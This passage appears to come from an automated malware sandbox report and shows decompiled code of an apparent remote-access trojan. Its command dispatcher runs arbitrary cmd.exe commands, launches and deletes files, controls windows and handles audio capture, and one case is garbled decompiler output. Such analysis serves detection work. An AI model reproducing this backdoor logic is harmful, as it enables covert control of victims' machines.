				E00401F6D(__edx,  &_v644);
				_t36 = __edx + 0xffffffd0;
				_t85 = _t36 - 7;
				if(_t36 <= 7) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M00418237))) {
						case 0:
							_push(L"Temp");
							goto L14;
						case 1:
							__ecx =  &_v620;
							__eax = E00416D45(__ebx,  &_v620);
							__ecx =  &_v644;
							__eax = E00401EFA( &_v644, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L14;
						case 3:
							_push(L"WinDir");
							goto L14;
						case 4:
							__eax = E00417614(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								__ecx =  &_v620;
								E0040427F(__ebx, __ecx, L"\\SysWOW64") = E0043987F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v580;
								__eax = E00403030( &_v580, __edx, __eax);
								__ecx =  &_v652;
								__eax = E00401EFA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v584;
								__eax = E00401EF0();
								__ecx =  &_v608;
								__eax = E00401EF0();
								L4:
								__ecx =  &_v620;
								goto L5;
							} else {
								__ecx =  &_v572;
								E0040427F(__ebx, __ecx, L"\\system32") = E0043987F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v628;
								__eax = E00403030( &_v628, __edx, __eax);
								__ecx =  &_v652;
								__eax = E00401EFA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v632;
								__eax = E00401EF0();
								__ecx =  &_v608;
								__eax = E00401EF0();
								__ecx =  &_v584;
								L5:
								__eax = E00401EF0();
								goto L15;
							}
							L16:
						case 5:
							_push(L"ProgramFiles");
							goto L14;
						case 6:
							_push(L"AppData");
							goto L14;
						case 7:
							_push(L"UserProfile"); // executed
							L14:
							_t51 = E0043987F(_t54, _t57, _t85); // executed
							E00409DC9(_t54,  &_v644, _t51);
							goto L15;
					}
				}
				L15:
				__imp__GetLongPathNameW(E00401EEB( &_v644),  &_v524, 0x208); // executed
				_t39 = E0040427F(_t54,  &_v560, _a4);
				_t40 = E0040427F(_t54,  &_v636, "\\");
				E00403030(_t77, E00403030( &_v600, E004183F4(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
				E00401EF0();
				E00401EF0();
				E00401EF0();
				E00401EF0();
				E00401EF0();
				return _t77;
				goto L16;
			}

0x0041805b
0x0041806a
0x0041806c
0x00418072
0x0041807a
0x0041807d
0x00418080
0x00418086
0x00000000
0x0041808d
0x00000000
0x00000000
0x00418097
0x0041809b
0x004180a1
0x004180a5
0x00000000
0x00000000
0x004180b8
0x00000000
0x00000000
0x004180c2
0x00000000
0x00000000
0x004180cc
0x004180d1
0x004180d3
0x0041812c
0x0041813b
0x00418142
0x0041814b
0x0041814d
0x00418151
0x00418158
0x0041815c
0x00418161
0x00418165
0x0041816a
0x0041816e
0x004180aa
0x004180aa
0x00000000
0x004180d5
0x004180da
0x004180e9
0x004180f0
0x004180f9
0x004180fb
0x004180ff
0x00418106
0x0041810a
0x0041810f
0x00418113
0x00418118
0x0041811c
0x00418121
0x004180ae
0x004180ae
0x00000000
0x004180ae
0x00000000
0x00000000
0x00418178
0x00000000
0x00000000
0x0041817f
0x00000000
0x00000000
0x00418186
0x0041818b
0x0041818b
0x00418196
0x00000000
0x00000000
0x00418086
0x0041819b
0x004181b2
0x004181c1
0x004181d0
0x004181f8
0x00418202
0x0041820b
0x00418214
0x0041821d
0x00418226
0x00418233
0x00000000

APIs

GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004181B2

Strings

SystemDrive, xrefs: 004180B8
WinDir, xrefs: 004180C2, 004180E4, 00418136
UserProfile, xrefs: 00418186
ProgramFiles, xrefs: 00418178
\system32, xrefs: 004180D5
AppData, xrefs: 0041817F
\SysWOW64, xrefs: 00418127
Temp, xrefs: 0041808D

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-1609423294
Opcode ID: 74f394d82779ad0012b07e917d5bead4f49688195dfc6a98f3ba2cc81fd7d5ca
Instruction ID: e17f698a51b082165e1e9e1ea6160020ed1fd31ab47ab9f863ee2cf3c228b6bb
Opcode Fuzzy Hash: 74f394d82779ad0012b07e917d5bead4f49688195dfc6a98f3ba2cc81fd7d5ca
Instruction Fuzzy Hash: EE4189721182409AC204FB21DC52DEF77A9BFA4748F50053FF846620F2EE785E4AC65B

Uniqueness

Uniqueness Score: -1.00%

Function 004123B9, Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 458
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004123B9(void* __ebx, CHAR* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a36, intOrPtr _a37, intOrPtr _a41, intOrPtr _a47, char _a61) {
				char _v116;
				char _v120;
				char _v140;
				char _v156;
				char _v164;
				void* _v172;
				char _v192;
				void* _v196;
				char _v212;
				char _v216;
				void* _v220;
				char _v240;
				void* _v244;
				char _v252;
				char _v264;
				void* _v268;
				void* _v284;
				char _v288;
				void* _v292;
				char _v304;
				char _v308;
				char _v312;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v364;
				char _v368;
				long _v372;
				int _v376;
				char _v396;
				char _v400;
				void* _v404;
				int _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v452;
				char _v500;
				char _v504;
				void* __esi;
				void* _t244;
				void* _t246;
				intOrPtr _t374;
				intOrPtr _t375;
				void* _t376;
				void* _t378;
				signed int _t379;
				signed int _t385;
				void* _t388;
				void* _t389;
				void* _t390;
				void* _t394;
				void* _t400;

				_t399 = __eflags;
				_t360 = __edx;
				_t294 = __ebx;
				_push(__ebx);
				_t374 = _a4;
				E004020EC(__ebx,  &_v308, __edx, __eflags, _t374 + 0x1c);
				SetEvent( *(_t374 + 0x34));
				_t375 =  *((intOrPtr*)(E00401F95( &_v312)));
				E004042A6( &_v312,  &_v288, 4, 0xffffffff);
				_t388 = (_t385 & 0xfffffff8) - 0x18c;
				E004020EC(__ebx, _t388, _t360, _t399, 0x46c238);
				_t389 = _t388 - 0x18;
				E004020EC(__ebx, _t389, _t360, _t399,  &_v304);
				E00417478( &_v444, _t360);
				_t390 = _t389 + 0x30;
				_t400 = _t375 - 0x8f;
				if(_t400 > 0) {
					_t376 = _t375 + 0xffffff70;
					__eflags = _t376 - 0x22;
					if(__eflags <= 0) {
						switch( *((intOrPtr*)(( *(_t376 + 0x413511) & 0x000000ff) * 4 +  &M004134C5))) {
							case 0:
								__ecx =  &_v420;
								__ecx = E00401E49( &_v420, __edx, __eflags, 0);
								__eax = E00401F95(__ecx);
								__ecx = __eax;
								__eax = E00407F83(__ecx);
								goto L126;
							case 1:
								__ecx =  &_v420;
								__ecx = E00401E49( &_v420, __edx, __eflags, 0);
								__eax = E00401F95(__eax);
								__eax = StrToIntA(__eax);
								__ecx =  &_v424;
								__edi = __eax;
								__ecx = E00401E49( &_v424, __edx, __eflags, 1);
								__eax = E00401F95(__eax);
								__dl = 0x30;
								__ecx =  &_v408;
								__eax = E0041805B( &_v408, __edx, __eax);
								__ecx =  &_v408;
								__eax = E00401EEB( &_v408);
								__ecx =  &_v428;
								__esi = __eax;
								__eax = E00401E49( &_v428, __edx, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx = __esi;
								__eax = E00417A4E(__esi);
								__esp = __esp + 0x18;
								__ecx =  &_v416;
								__edx = E00401EEB( &_v416);
								__ecx = __edi;
								__eax = E00417F10(__edi, __edx);
								goto L106;
							case 2:
								__ecx =  &_v420;
								__ecx = E00401E49( &_v420, __edx, __eflags, 1);
								__eax = E00401F95(__eax);
								__ecx =  &_v424;
								__ecx = E00401E49( &_v424, __edx, __eflags, 0);
								__eax = E00401F95(__ecx);
								__eax = SetWindowTextW(__eax, __eax);
								goto L20;
							case 3:
								__ecx =  &_v420;
								__eax = E00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00413545(__ebx, __edx);
								goto L103;
							case 4:
								__ecx =  &_v420;
								__eax = E00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00413673(__ecx, __eflags);
								goto L103;
							case 5:
								E004020EC(__ebx, _t390 - 0x18, _t360, __eflags, E00401E49( &_v420, _t360, __eflags, 0));
								E0040691F(_t360);
								goto L103;
							case 6:
								__ecx =  &_v420;
								__eax = E00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00415397(__edx);
								goto L103;
							case 7:
								__ecx =  &_v420;
								__eax = E00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00404013(__edx);
								goto L103;
							case 8:
								__eax = E0041667F(__ebx);
								goto L126;
							case 9:
								__eax = E004167AD(__ebx, __eflags);
								goto L126;
							case 0xa:
								__eax = E004167EA(__eax);
								goto L126;
							case 0xb:
								__ebx = 0;
								__ecx =  &_v420;
								__ecx = E00401E49( &_v420, __edx, __eflags, 0);
								__eax = E00405220(0);
								__ecx =  &_v428;
								__eflags =  *__eax - __bl;
								__ebx = 0 | __eflags != 0x00000000;
								__eax = E00401E49( &_v428, __edx, __eflags, 1);
								__dl = __bl;
								__ecx = __eax;
								__eax = E0041678C(__ecx, __edx, __edi, __esi);
								goto L126;
							case 0xc:
								__eax = E004167F2(__edx);
								goto L126;
							case 0xd:
								__eax = E00405F77(__ebx, __ecx, __edx);
								__ecx =  &_v420;
								__esi = __eax;
								__eax = E00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx =  &_v340;
								__edi = __esp;
								__edx = __esi;
								__edx = E00417226(__ebx,  &_v340, __esi);
								__ecx =  &_v372;
								__edx = __eax;
								__ecx = __edi;
								__eax = E00402F93(__ebx, __edi, __edx, __eflags, __eax);
								_push(0xab);
								goto L125;
							case 0xe:
								__eflags =  *0x46bb03;
								if( *0x46bb03 != 0) {
									ShowWindow( *0x46bebc, 9) = SetForegroundWindow( *0x46bebc);
								} else {
									__cl = 1;
									__eax = E00418F59(__ebx, __ecx, __edx);
									__ebx = 0;
									__eax = CreateThread(0, 0, E00418D28, 0, 0, 0);
									 *0x46bb03 = 2;
								}
								goto L126;
							case 0xf:
								_push(5);
								goto L16;
							case 0x10:
								__ebx = 0;
								_push(0);
								_push(0);
								goto L17;
							case 0x11:
								__ecx =  &_v116;
								__eax = E004072F6( &_v116);
								__ecx =  &_v420;
								__eax = E00401E49( &_v420, __edx, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v428;
								__eax = E00401E49( &_v428, __edx, __eflags, 1);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v436;
								__eax = E00401E49( &_v436, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v140;
								__eax = E00405BD3( &_v140, __edx);
								__ecx =  &_v212;
								__eax = L00407304(__ebx, __ecx, __esi);
								goto L126;
							case 0x12:
								goto L126;
						}
					}
					goto L126;
				} else {
					if(_t400 == 0) {
						L131();
						_v348 = E00436769(_t237, E00401F95(E00401E49( &_v420, _t360, __eflags, 2)));
						_v344 =  &_v120;
						E004139B3(__ebx, _t360, 0x46c238, __eflags,  &_v348);
						_t120 = E0040805A() - 1; // -1
						_t378 = _t120;
						_t244 = E00401E49( &_v428, _t360, __eflags, 3);
						_t394 = _t390 - 0x18;
						E004020EC(_t294, _t394, _t360, __eflags, _t244);
						_t246 = E00401E49( &_v436, _t360, __eflags, 2);
						E004020EC(_t294, _t394 - 0x18, _t360, __eflags, _t246);
						E0040427F(_t294, _t394, E00401F95(E00401E49( &_v444, _t360, __eflags, 1)));
						E0040427F(_t294, _t394 - 0xffffffffffffffe8, E00401F95(E00401E49( &_v452, _t360, __eflags, 0)));
						E004077EC( &_v156, _t360, __eflags);
						__eflags = _v252;
						if(_v252 == 0) {
							E00408007( &_v420,  *((intOrPtr*)(E00407FE6(E0040806E( &_v156,  &_v504),  &_v500, _t378))));
						}
						E00407FDE(_t294,  &_v212, _t378);
						goto L126;
					} else {
						_t379 = _t375 - 1;
						if(_t379 > 0x33) {
							L126:
							_t163 =  &_v420; // 0x404538
							E00401E74(_t163, _t360);
							E00401FC7();
							E00401FC7();
							return 0;
						} else {
							switch( *((intOrPtr*)(_t379 * 4 +  &M004133F5))) {
								case 0:
									_t263 = E00417226(0,  &_v368, GetTickCount());
									_t265 = E00417226(0,  &_v336, E004171D6( &_v368));
									_t266 = E0041719C( &_v140); // executed
									_t267 = E0041739C(0,  &_v164, _t266);
									_t369 = E00402F93(0,  &_v404, E00402F1D( &_v264, E00402F93(0,  &_v240, E00402F1D( &_v216, E00402FB7( &_v192, E00401E49( &_v420, _t266, _t401, 0), 0x46c238), _t267), _t401, 0x46c238), _t265), _t401, 0x46c238);
									E00402F1D(_t390 - 0x18, _t273, _t263);
									_push(0x4c);
									E00404AA4(0, 0x46c780, _t273, _t401); // executed
									E00401FC7();
									E00401FC7();
									E00401FC7();
									E00401FC7();
									E00401FC7();
									E00401FC7();
									E00401EF0();
									E00401FC7();
									E00401FC7();
									_t287 = E00436769(_t285, E00401F95(E00401E49( &_v452, _t273, _t401, 1)));
									if(_t287 == 0) {
										E00401E49( &_v440, _t369, __eflags, 0);
										_t360 = "0";
										_t289 = E00405A6F("0");
										__eflags = _t289;
										if(_t289 != 0) {
											_push(0);
											_t358 = 0x46c780;
											goto L10;
										}
									} else {
										_t360 = _t287 + _t287;
										if(E0040484A(0x46c780) == 0) {
											E00404E9A(0x46c780, _t360, 1);
										} else {
											E00404FAD(0x46c238, _t360);
										}
									}
									goto L126;
								case 1:
									_push(0);
									__ecx = 0x46c780;
									L10:
									E0040511B(_t358, 0x46c238);
									goto L126;
								case 2:
									__ecx =  &_v368;
									__eax = E00417C05(__ebx,  &_v368);
									__esp = __esp - 0x18;
									__edx = __eax;
									__ecx = __esp;
									__eax = E0041739C(__ebx, __esp, __edx);
									_push(0x33);
									__ecx = 0x46c780;
									__eax = E00404AA4(__ebx, 0x46c780, __edx, __eflags);
									__ecx =  &_v396;
									goto L107;
								case 3:
									goto L126;
								case 4:
									 &_v376 = GetCurrentProcessId();
									__eax = E0043BACE(__ecx, __eax,  &_v376, 0xa);
									__esp = __esp - 0xc;
									__eax =  &_v376;
									__esi = __esp;
									__ecx =  &_v336;
									__edx = E0040D211(__ebx,  &_v336, __eflags);
									__ecx =  &_v368;
									__edx = __eax;
									__ecx = __esi;
									__eax = E00405343(__ebx, __esi, __edx, __edi, __eflags,  &_v376);
									_push(0x4f);
									L125:
									__ecx = 0x46c780;
									__eax = E00404AA4(__ebx, 0x46c780, __edx, __eflags);
									__ecx =  &_v396;
									__eax = E00401FC7();
									__ecx =  &_v364;
									__eax = E00401FC7();
									goto L126;
								case 5:
									__ecx =  &_v420;
									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
									__eax = E00401F95(__ecx);
									__ecx = __eax;
									__eax = E004171F9(__ecx);
									goto L126;
								case 6:
									L20:
									__eax = E00413909(__edx);
									goto L126;
								case 7:
									__ecx =  &_v420;
									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
									__eax = E00401F95(__ecx);
									__eax = CloseWindow(__eax);
									goto L126;
								case 8:
									_push(3);
									goto L16;
								case 9:
									_push(9);
									L16:
									_push(0);
									L17:
									__ecx =  &_v420;
									__ecx = E00401E49( &_v420, __edx, __eflags);
									__eax = E00401F95(__ecx);
									__eax = ShowWindow(__eax, ??);
									goto L126;
								case 0xa:
									__eax =  &_v372;
									__ecx =  &_v420;
									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
									__eax = E00401F95(__ecx);
									__eax = GetWindowThreadProcessId(__eax,  &_v372);
									__ecx = _v376;
									__eax = E004171F9(_v376);
									goto L20;
								case 0xb:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
									__eax = E00401F95(__eax);
									__ecx =  &_v340;
									__eax = E0040427F(0,  &_v340, __eax);
									__edx = L"/C ";
									__ecx =  &_v376;
									__ecx = __eax;
									__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
									__ecx =  &_v376;
									__eax = E00401EF0();
									__ecx =  &_v344;
									goto L107;
								case 0xc:
									__ecx =  &_v420;
									__eax = E00401E49( &_v420, __edx, __eflags, 1);
									__ecx = 0x46c2d0;
									__eax = E00401FAD(0x46c2d0, __eax);
									__eflags =  *0x46bae3 - __bl;
									if(__eflags == 0) {
										__ecx =  &_v420;
										__eax = E00401E49( &_v420, __edx, __eflags, 0);
										__esp = __esp - 0x18;
										__ecx = __esp;
										__eax = E004055EA();
										goto L103;
									}
									goto L126;
								case 0xd:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
									E00401F95(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
									goto L126;
								case 0xe:
									__ecx =  &_v420;
									__eax = E00401E49( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c868;
									__eax = E00401FAD(0x46c868, __eax);
									__ecx =  &_v428;
									__ecx = E00401E49( &_v428, __edx, __eflags, 3);
									__eax = E00401F95(__ecx);
									__esi = __eax;
									__eax = E0041451F(__edx, __edi, __eax);
									__ecx =  &_v432;
									__ecx = E00401E49( &_v432, __edx, __eflags, 2);
									__eax = E00401F95(__ecx);
									__eax = E00436769(__ecx, __eax);
									__eflags = __eax;
									__ecx =  &_v436;
									_t57 = __eax != 0;
									__eflags = _t57;
									__ebx = 0 | _t57;
									__ecx = E00401E49( &_v436, __edx, _t57, 1);
									E00401F95(__ecx) = E00436769(__ecx, __eax);
									__dl = __bl;
									__cl = __al;
									__eax = E0041459C(__ecx, __edx, __eflags, __esi);
									goto L26;
								case 0xf:
									 *0x46bd6a = 1;
									__eax = __eax + 0x46bd6a;
									__ecx = __ecx + __ebp;
									asm("wait");
									__eax = __eax |  *__eax;
									 *__edx =  *__edx + __ch;
									__eflags =  *__edx;
									goto L126;
								case 0x10:
									__ecx =  &_v420;
									__eax = E00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x46c350;
									__eax = E0040857D(0x46c350, __edx);
									goto L126;
								case 0x11:
									__ecx = 0x46c350;
									__eax = E004093AD(0x46c350);
									goto L126;
								case 0x12:
									__ecx = 0x46c350;
									__eax = E0040951E(__ebx, 0x46c350);
									goto L126;
								case 0x13:
									__ecx =  &_v420;
									__eax = E00401E49( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c3e0;
									__eax = E00401FAD(0x46c3e0, __eax);
									__ecx = 0x46c350;
									goto L33;
								case 0x14:
									 *0x46bd6c =  *0x46bd6c + 1;
									__eflags =  *0x46bd6c;
									__eflags = __eax;
									__ecx =  &_v420;
									__eax = E00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x46c350;
									__eax = E00408FF0(0x46c350, __edx);
									goto L36;
								case 0x15:
									__esi = 0x46c350;
									__ecx = 0x46c350;
									__eax = E00409D36(0x46c350);
									__ecx = 0x46c350;
									L33:
									__eax = E00408E9E(__ebx, __ecx);
									goto L126;
								case 0x16:
									__eflags =  *0x46baf9 - __bl;
									asm("sbb eax, 0x46baf9");
									if(__eflags == 0) {
										__edx = 0;
										__cl = 0;
										__eax = E0040A679(0);
									}
									goto L126;
								case 0x17:
									__ebx = 0;
									__ecx =  &_v420;
									__eax = E00401E49( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c1b8;
									__eax = E00401FAD(0x46c1b8, __eax);
									__ecx = 0x46c1d0;
									__eax = E0040498B(0x46c1d0);
									__esp = __esp - 0x10;
									__esi = 0x46bacc;
									__edi = __esp;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi = 0x46c1d0;
									__ecx = 0x46c1d0;
									__eax = E00404A08(__edx);
									__esp = __esp - 0x18;
									__ecx = __esp;
									_push(0x46c1b8);
									__eflags =  *0x46baaa - __bl; // 0x0
									if(__eflags == 0) {
										__eax = E004020EC(0, __ecx, __edx, __eflags);
									} else {
										__eax = E004020EC(0, __ecx, __edx, __eflags);
									}
									__ecx = __esi;
									__eax = E00404AA4(__ebx, __esi, __edx, __eflags);
									__ecx = __esi;
									__eax = E00404BBE(__ecx, __edx, 0x404538, __ebx);
									goto L126;
								case 0x18:
									__eax =  *0x46bac0();
									__ecx = 0x46c1d0;
									__eax = E00404E0B(0x46c1d0);
									goto L126;
								case 0x19:
									__ebx = 0;
									__ecx =  &_v420;
									 *0x46ba74 = __bl;
									__eax = E00401E49( &_v420, __edx, __eflags, 3);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(0, __esp, __edx, __eflags, __eax);
									__ecx =  &_v428;
									__ecx = E00401E49( &_v428, __edx, __eflags, 2);
									__eax = E00401F95(__ecx);
									_push(__eax);
									__ecx =  &_v432;
									__ecx = E00401E49( &_v432, __edx, __eflags, 1);
									__eax = E00401F95(__ecx);
									__eax = E00436769(__ecx, __eax);
									__ecx =  &_v436;
									__esi = __eax;
									__ecx = E00401E49( &_v436, __edx, __eflags, 0);
									__eax = E00401F95(__ecx);
									__eax = E00436769(__ecx, __eax);
									__edx = __esi;
									__ecx = __eax;
									__eax = E004016F8(__ecx, __edx, __edi, __esi);
									goto L126;
								case 0x1a:
									_push( *0x46bab8);
									__eax = __eax ^ 0x0046bab8;
									 *0x46ba74 = 1;
									waveInStop(??) = waveInClose( *0x46bab8);
									goto L126;
								case 0x1b:
									 *0x46bd6c =  *0x46bd6c + 1;
									__eflags =  *0x46bd6c;
									__eax = 0x46bd6c + __eax;
									__ecx =  &_v420;
									__eax = E00401E49( &_v420, __edx, __eflags, 1);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx =  &_v428;
									__eax = E00401E49( &_v428, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00410188(__edx);
									__esp = __esp + 0x30;
									L36:
									 *0x46bd6c =  *0x46bd6c - 1;
									goto L126;
								case 0x1c:
									__ecx =  &_v420;
									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
									E00401F95(__ecx) = DeleteFileW(__eax);
									goto L126;
								case 0x1d:
									__eax = E0041015B();
									ExitProcess(0);
								case 0x1e:
									while(1) {
										__eflags =  *0x46bd6c - __ebx;
										if( *0x46bd6c == __ebx) {
											break;
										}
										Sleep(0x64);
									}
									__al = __al + __ch;
									__eflags = __al;
									E0040AD84();
									_pop(__ebx);
									__al = __al & 0x00000041;
									__cl = __cl + __ah;
									__eax = __eax & 0x2f500041;
									__ecx = __ecx + 1;
									__ah = __ah + __al;
									__eax = __eax ^  *__ecx;
									asm("les esi, [ebx]");
									__ecx = __ecx + 1;
									__dl = __dl + __ch;
									__eax = __eax & 0x262e0041;
									__ecx = __ecx + 1;
									__cl = __cl + __dl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ebx + 0x26)) =  *((intOrPtr*)(__ebx + 0x26)) + __dl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x26)) =  *((intOrPtr*)(__eax + 0x26)) + __bh;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi - 0x5cffbeda)) =  *((intOrPtr*)(__edi - 0x5cffbeda)) + __bl;
									__ecx = __ecx + 1;
									__bl = __bl + __bl;
									__ecx = __ecx + 1;
									 *0x77004127 =  *0x77004127 + __dh;
									asm("daa");
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x1d004127)) =  *((intOrPtr*)(__eax + 0x1d004127)) + __ah;
									 *__ecx =  *__ecx - __al;
									 *__eax =  *__eax - __ebp;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__esi + 0x28)) =  *((intOrPtr*)(__esi + 0x28)) + __cl;
									__ecx = __ecx + 1;
									_a36 = _a36 + __bl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax +  &_a61)) =  *((intOrPtr*)(__eax +  &_a61)) + __ch;
									 *((intOrPtr*)(__ecx - 0x3dffbed8)) =  *((intOrPtr*)(__ecx - 0x3dffbed8)) + __dl;
									 *__ecx =  *__ecx - __al;
									0x4133();
									__ah = __ah + __al;
									__eax = __eax ^  *__ecx;
									 *__eax =  *__eax >> __cl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x29)) =  *((intOrPtr*)(__eax + 0x29)) + __cl;
									__ecx = __ecx + 1;
									_a37 = _a37 + __bl;
									__ecx = __ecx + 1;
									__cl = __cl + __bl;
									 *__ecx =  *__ecx - __eax;
									asm("std");
									 *__ecx =  *__ecx - __eax;
									__eflags = __al - 0x2a;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edx + 0x2a)) =  *((intOrPtr*)(__edx + 0x2a)) + __bl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi + 0x2a)) =  *((intOrPtr*)(__edi + 0x2a)) + __ch;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edx +  &_a61)) =  *((intOrPtr*)(__edx +  &_a61)) + __bh;
									 *((intOrPtr*)(__esi + 0x1c00412a)) =  *((intOrPtr*)(__esi + 0x1c00412a)) + __cl;
									__eax = __eax -  *__ecx;
									asm("invalid");
									__ecx = __ecx + 1;
									__cl = __cl + __ah;
									__eax = __eax -  *__ecx;
									 *0x2cee0041 = __ch;
									__ecx = __ecx + 1;
									_a41 = _a41 + __ch;
									__ecx = __ecx + 1;
									__dl = __dl + __ch;
									__eax = __eax - 0x2e1e0041;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__esi + 0x2e)) =  *((intOrPtr*)(__esi + 0x2e)) + __ch;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x2e)) =  *((intOrPtr*)(__eax + 0x2e)) + __bh;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax - 0x47ffbed2)) =  *((intOrPtr*)(__eax - 0x47ffbed2)) + __bl;
									__ecx = __ecx + 1;
									__al = __al + __bl;
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __dh;
									asm("das");
									__ecx = __ecx + 1;
									__ah = __ah + __al;
									__eax = __eax ^  *__ecx;
									__eflags = __eax;
									if(__eax == 0) {
										__ecx = __ecx + 1;
										__ch = __ch + __ch;
										 *__ecx =  *__ecx ^ __al;
										asm("adc dh, [ecx]");
										__ecx = __ecx + 1;
										 *__edx =  *__edx + __dl;
										__al = __al ^  *__ecx;
										__dh =  *__edx;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__edx - 0x35ffbece)) =  *((intOrPtr*)(__edx - 0x35ffbece)) + __ch;
										 *__ecx =  *__ecx ^ __al;
										__edx = __edx - 1;
										__al = __al ^  *__ecx;
										_push(0x32);
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__eax + 0x33)) =  *((intOrPtr*)(__eax + 0x33)) + __dl;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__edi + 0x33)) =  *((intOrPtr*)(__edi + 0x33)) + __dl;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__esi + 0x33)) =  *((intOrPtr*)(__esi + 0x33)) + __bl;
										__ecx = __ecx + 1;
										 *__ecx =  *__ecx + __ah;
										__eflags =  *__ecx;
									}
									__eax = __eax ^  *__ecx;
									asm("retf 0x4132");
									_a47 = _a47 + __ah;
									__ecx = __ecx + 1;
									__ah = __ah + __dl;
									__al = __al ^  *__ecx;
									__dh = __dh +  *__edx;
									__ecx = __ecx + 1;
									 *__ecx =  *__ecx + __cl;
									__al = __al ^  *__ecx;
									_t216 = __eax;
									__eax = __edi;
									__edi = _t216;
									 *__ecx =  *__ecx ^ __eax;
									asm("les esi, [ebx]");
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
									asm("adc al, [ecx]");
									asm("adc al, [edx]");
									__edx = __edx +  *__edx;
									__al = __al + 5;
									_push(es);
									_pop(es);
									asm("adc dl, [edx]");
									asm("adc cl, [eax]");
									 *__edx =  *__edx | __ecx;
									asm("adc cl, [ebx]");
									__al = __al | 0x00000012;
									asm("adc dl, [edx]");
									asm("adc dl, [edx]");
									asm("adc dl, [edx]");
									__eax = __eax | 0x12100f0e;
									asm("adc dl, [edx]");
									asm("adc [esi-0x75], edx");
									_push(__esi);
									__esi = __ecx;
									__ecx = __esi + 4;
									E0040484E(__ebx, __esi + 4, 0) = __esi;
									_pop(__esi);
									return __esi;
									goto L132;
								case 0x1f:
									__eax = E0040B488(__ebx, __eflags);
									goto L126;
								case 0x20:
									while(1) {
										__eflags =  *0x46bd6c - __ebx; // 0x0
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ebx = 0;
									__ecx =  &_v420;
